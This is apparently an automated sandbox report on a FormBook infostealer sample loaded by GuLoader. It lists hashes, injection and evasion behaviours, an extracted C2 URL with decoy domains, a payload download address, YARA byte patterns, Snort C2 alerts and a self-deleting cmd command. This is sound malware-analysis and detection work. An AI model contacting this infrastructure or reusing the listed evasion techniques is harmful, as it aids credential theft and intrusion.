Edit tour

Windows Analysis Report
MaMsKRmgXZ.exe

Overview

General Information

Sample Name:	MaMsKRmgXZ.exe
Analysis ID:	1324095
MD5:	ced4af5a976fb361bfded06260f5985f
SHA1:	a4d8b6552d82bf400bd2c5177263d37d044b079a
SHA256:	ca26fd8d4675cfec9eee79a402ce93024e4b817655df0307ba3d9dba93f918b2
Infos:

Detection

FormBook, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Antivirus / Scanner detection for submitted sample

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Yara detected GuLoader

Snort IDS alert for network traffic

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Found decision node followed by non-executed suspicious APIs

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

PE / OLE file has an invalid certificate

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64native

MaMsKRmgXZ.exe (PID: 4828 cmdline: C:\Users\user\Desktop\MaMsKRmgXZ.exe MD5: CED4AF5A976FB361BFDED06260F5985F)

MaMsKRmgXZ.exe (PID: 6720 cmdline: C:\Users\user\Desktop\MaMsKRmgXZ.exe MD5: CED4AF5A976FB361BFDED06260F5985F)

explorer.exe (PID: 5384 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)

cscript.exe (PID: 5612 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 13783FF4A2B614D7FBD58F5EEBDEDEF6)

cmd.exe (PID: 1648 cmdline: /c del "C:\Users\user\Desktop\MaMsKRmgXZ.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/ https://blog.malwarebytes.com/scams/2020/08/sba-phishing-scams-from-malware-to-advanced-social-engineering/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.pwpholdings.com/ro12/"], "decoy": ["start399.com", "decyfincoin.com", "binguozhijiaok.com", "one45.vip", "55dy5s.top", "regmt.pro", "2ahxgaafifl.com", "xn--6rtp2flvfc2h.com", "justinmburns.com", "los3.online", "fleshaaikensdivinegiven7llc.com", "servicedelv.services", "apexcaryhomesforsale.com", "shuraop.xyz", "sagetotal.com", "gratitude-et-compagnie.com", "riderarea.com", "digitalserviceact.online", "contentbyc.com", "agenda-digital-planner.com", "senior-living-91799.bond", "navigationexperiments.com", "tiktok-shop-he.com", "qualityquickprints.com", "ddbetting.com", "navigatenuggets.com", "indiannaturals.online", "xzgx360.com", "xlrj.asia", "seagaming.net", "saltcasing.info", "pq-es.com", "doubleapus.com", "speedgallery.shop", "millions-fans.com", "ktrandnews.com", "niaeoer.com", "60plusmen.com", "nala.dev", "costanotaryservice.com", "palokallio.net", "sportsynergyemporium.fun", "fathomtackle.com", "computer-chronicles.com", "valeriaestate.com", "holzleisten24.shop", "ps212naming.com", "blessed-autos.com", "rptiki.com", "bjykswkj.com", "vorbergh.info", "ssongg273.cfd", "thevitaminstore.store", "easyeats307.com", "mcied.link", "ssongg1620.cfd", "y-12federalcreditunion.top", "jlh777.com", "no5th3267.top", "toolifyonline.com", "hcsjwdy.com", "ypwvj8.top", "hja357b.com", "bajie6.com"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.9970004470.0000000033E50000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.9970004470.0000000033E50000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.9970004470.0000000033E50000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.9970004470.0000000033E50000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.9970004470.0000000033E50000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000005.00000002.14563427538.0000000004500000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.14563427538.0000000004500000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.14563427538.0000000004500000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.14563427538.0000000004500000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.14563427538.0000000004500000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.9948810061.0000000000170000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.9948810061.0000000000170000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.9948810061.0000000000170000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.9948810061.0000000000170000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.9948810061.0000000000170000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.9888945373.0000000005969000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: MaMsKRmgXZ.exe PID: 6720	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x82a79:$a1: 3C 30 50 4F 53 54 74 09 40 0x1ee756:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 22 entries

Snort Signatures

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 185.104.28.238

Timestamp:	192.168.11.20185.104.28.23850022802031412 10/11/23-23:00:16.443832
SID:	2031412
Source Port:	50022
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 104.247.82.94

Timestamp:	192.168.11.20104.247.82.9450027802031412 10/11/23-23:02:19.557969
SID:	2031412
Source Port:	50027
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 154.12.93.8

Timestamp:	192.168.11.20154.12.93.850020802031412 10/11/23-22:59:35.376043
SID:	2031412
Source Port:	50020
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 52.20.84.62

Timestamp:	192.168.11.2052.20.84.6250028802031412 10/11/23-23:02:39.898715
SID:	2031412
Source Port:	50028
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 154.197.227.142

Timestamp:	192.168.11.20154.197.227.14250021802031412 10/11/23-22:59:57.794442
SID:	2031412
Source Port:	50021
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 91.195.240.123

Timestamp:	192.168.11.2091.195.240.12350015802031412 10/11/23-22:56:51.023724
SID:	2031412
Source Port:	50015
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 34.120.249.181

Timestamp:	192.168.11.2034.120.249.18150018802031412 10/11/23-22:58:13.359547
SID:	2031412
Source Port:	50018
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 130.185.109.77

Timestamp:	192.168.11.20130.185.109.7750019802031412 10/11/23-22:59:14.631131
SID:	2031412
Source Port:	50019
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 18.119.154.66

Timestamp:	192.168.11.2018.119.154.6650025802031412 10/11/23-23:01:17.694616
SID:	2031412
Source Port:	50025
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 34.120.249.181

Timestamp:	192.168.11.2034.120.249.18150026802031412 10/11/23-23:02:00.232802
SID:	2031412
Source Port:	50026
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 38.242.133.61

Timestamp:	192.168.11.2038.242.133.6150030802031412 10/11/23-23:03:44.695205
SID:	2031412
Source Port:	50030
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GuLoader Encoded Binary Request M2 - Source IP: 192.168.11.20 - Destination IP: 103.72.68.128

Timestamp:	192.168.11.20103.72.68.12850012802855192 10/11/23-22:55:50.644822
SID:	2855192
Source Port:	50012
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 104.18.233.42

Timestamp:	192.168.11.20104.18.233.4250016802031412 10/11/23-22:57:11.130716
SID:	2031412
Source Port:	50016
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 15.197.142.173

Timestamp:	192.168.11.2015.197.142.17350023802031412 10/11/23-23:00:36.461050
SID:	2031412
Source Port:	50023
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 208.91.197.39

Timestamp:	192.168.11.20208.91.197.3950024802031412 10/11/23-23:00:57.133284
SID:	2031412
Source Port:	50024
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 3.64.163.50

Timestamp:	192.168.11.203.64.163.5050017802031412 10/11/23-22:57:51.976587
SID:	2031412
Source Port:	50017
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query to a *.top domain - Likely Hostile - Source IP: 192.168.11.20 - Destination IP: 1.1.1.1

Timestamp:	192.168.11.201.1.1.153908532023883 10/11/23-22:58:12.039557
SID:	2023883
Source Port:	53908
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.pwpholdings.com/ro12/"], "decoy": ["start399.com", "decyfincoin.com", "binguozhijiaok.com", "one45.vip", "55dy5s.top", "regmt.pro", "2ahxgaafifl.com", "xn--6rtp2flvfc2h.com", "justinmburns.com", "los3.online", "fleshaaikensdivinegiven7llc.com", "servicedelv.services", "apexcaryhomesforsale.com", "shuraop.xyz", "sagetotal.com", "gratitude-et-compagnie.com", "riderarea.com", "digitalserviceact.online", "contentbyc.com", "agenda-digital-planner.com", "senior-living-91799.bond", "navigationexperiments.com", "tiktok-shop-he.com", "qualityquickprints.com", "ddbetting.com", "navigatenuggets.com", "indiannaturals.online", "xzgx360.com", "xlrj.asia", "seagaming.net", "saltcasing.info", "pq-es.com", "doubleapus.com", "speedgallery.shop", "millions-fans.com", "ktrandnews.com", "niaeoer.com", "60plusmen.com", "nala.dev", "costanotaryservice.com", "palokallio.net", "sportsynergyemporium.fun", "fathomtackle.com", "computer-chronicles.com", "valeriaestate.com", "holzleisten24.shop", "ps212naming.com", "blessed-autos.com", "rptiki.com", "bjykswkj.com", "vorbergh.info", "ssongg273.cfd", "thevitaminstore.store", "easyeats307.com", "mcied.link", "ssongg1620.cfd", "y-12federalcreditunion.top", "jlh777.com", "no5th3267.top", "toolifyonline.com", "hcsjwdy.com", "ypwvj8.top", "hja357b.com", "bajie6.com"]}

Yara detected FormBook

Source: Yara match	File source: 00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.9970004470.0000000033E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.14563427538.0000000004500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.9948810061.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Antivirus / Scanner detection for submitted sample

Source: MaMsKRmgXZ.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.nala.dev/ro12/	Avira URL Cloud: Label: malware
Source: http://www.los3.online/ro12/www.start399.com	Avira URL Cloud: Label: malware
Source: http://www.xlrj.asia/ro12/www.fathomtackle.com	Avira URL Cloud: Label: malware
Source: http://www.doubleapus.com/ro12/	Avira URL Cloud: Label: malware
Source: http://www.los3.online/ro12/	Avira URL Cloud: Label: malware
Source: http://www.riderarea.com/ro12/?3fY=-ZkX&pR-=LGYu0+ofLQhP7724nJ/BQ1gFrbGvfVPqmQuS2LiwheVAxFjzT3VG9Q3bfEwRvtUKPFG/	Avira URL Cloud: Label: malware
Source: http://www.nala.dev/ro12/www.rptiki.com	Avira URL Cloud: Label: malware
Source: http://www.fathomtackle.com/ro12/www.digitalserviceact.online	Avira URL Cloud: Label: malware
Source: http://www.ktrandnews.com/ro12/	Avira URL Cloud: Label: malware
Source: http://www.niaeoer.com/ro12/www.shuraop.xyz	Avira URL Cloud: Label: malware
Source: http://www.ktrandnews.com/ro12/www.nala.dev	Avira URL Cloud: Label: malware
Source: http://www.ps212naming.com/ro12/?pR-=rtUgTuNL7uL+LGGSpkT0QUDqa6bNuU9c/oVzs0vN/XeiV6RFY6H23yk7imnqF7CC5MmR&Wx=ChSLGhh0Mn9TylKP	Avira URL Cloud: Label: malware
Source: http://www.senior-living-91799.bond/ro12/www.riderarea.com	Avira URL Cloud: Label: malware
Source: http://www.justinmburns.com/ro12/	Avira URL Cloud: Label: malware
Source: http://www.qualityquickprints.com/ro12/?pR-=uQgh28/mwUTAreWLWMvWctCpaYYKSPk/RTU2hG/2GkXh2eCF81faGnz4QbuRWtjyYx7X&Wx=ChSLGhh0Mn9TylKP	Avira URL Cloud: Label: malware
Source: http://www.55dy5s.top/ro12/?pR-=YIi7nDQw6o4IM6Y7GVEqMnWSon2sCGETt9fQ5s5Vu4Y8lCbsapzjTWOCPxSAe4pqXmXo&Wx=ChSLGhh0Mn9TylKP	Avira URL Cloud: Label: phishing
Source: http://www.55dy5s.top/ro12/	Avira URL Cloud: Label: phishing
Source: http://www.ddbetting.com/ro12/?pR-=hMzxxbkXjK5UhHFUVKKzsXjiG5SdjoCmZm0mRTZiy05C1nCrhTC2iqR8bXRfdiWJf26x&Wx=ChSLGhh0Mn9TylKP	Avira URL Cloud: Label: malware
Source: http://www.55dy5s.top/ro12/?3fY=-ZkX&pR-=YIi7nDQw6o4IM6Y7GVEqMnWSon2sCGETt9fQ5s5Vu4Y8lCbsapzjTWOCPxSAe4pqXmXo	Avira URL Cloud: Label: phishing
Source: http://www.rptiki.com/ro12/www.tiktok-shop-he.com	Avira URL Cloud: Label: malware
Source: http://www.ps212naming.com	Avira URL Cloud: Label: malware
Source: http://www.shuraop.xyz/ro12/	Avira URL Cloud: Label: phishing
Source: http://www.rptiki.com	Avira URL Cloud: Label: phishing
Source: http://www.holzleisten24.shop/ro12/www.xlrj.asia	Avira URL Cloud: Label: malware
Source: http://www.easyeats307.com/ro12/www.doubleapus.com	Avira URL Cloud: Label: malware
Source: http://www.digitalserviceact.online/ro12/?pR-=4oHDpgyPUiJGP23m0SdAgh/yfEH8JJ8nkAUqpp/b29PXB/3TZ/gO5/kpv5F7QImaAVTW&Wx=ChSLGhh0Mn9TylKP	Avira URL Cloud: Label: malware
Source: http://www.start399.com/ro12/?pR-=GwGtW18azFWuCI/cWsMSGkvtLVgXrxrAejaoI1gQoBI/O/ZzRnUmOmWdpT96riJEH3vd&Wx=ChSLGhh0Mn9TylKP	Avira URL Cloud: Label: malware
Source: http://www.xlrj.asia	Avira URL Cloud: Label: phishing
Source: http://www.holzleisten24.shop/ro12/	Avira URL Cloud: Label: malware
Source: http://www.shuraop.xyz/ro12/www.qualityquickprints.com	Avira URL Cloud: Label: phishing
Source: http://www.fathomtackle.com/ro12/?pR-=gzgOk9L9AfWHfN0tCkhRIi8dk8p3PFyiDnwZelvp2AG1WsshoUlVSypZKzCbkCaQBejH&Wx=ChSLGhh0Mn9TylKP	Avira URL Cloud: Label: malware
Source: http://www.niaeoer.com/ro12/?pR-=dJqi3gPkjgABca74pxnHJ2flNeCuOiIkF0IIcqv13LRvEaAIYFadFLyq9bv/k+1Q0EDq&Wx=ChSLGhh0Mn9TylKP	Avira URL Cloud: Label: malware
Source: http://103.72.68.128/pcd/wAYOlXAIjrMljL79.bin	Avira URL Cloud: Label: malware
Source: http://www.senior-living-91799.bond/ro12/	Avira URL Cloud: Label: malware
Source: http://www.tiktok-shop-he.com/ro12/	Avira URL Cloud: Label: malware
Source: http://www.digitalserviceact.online/ro12/www.ddbetting.com	Avira URL Cloud: Label: malware
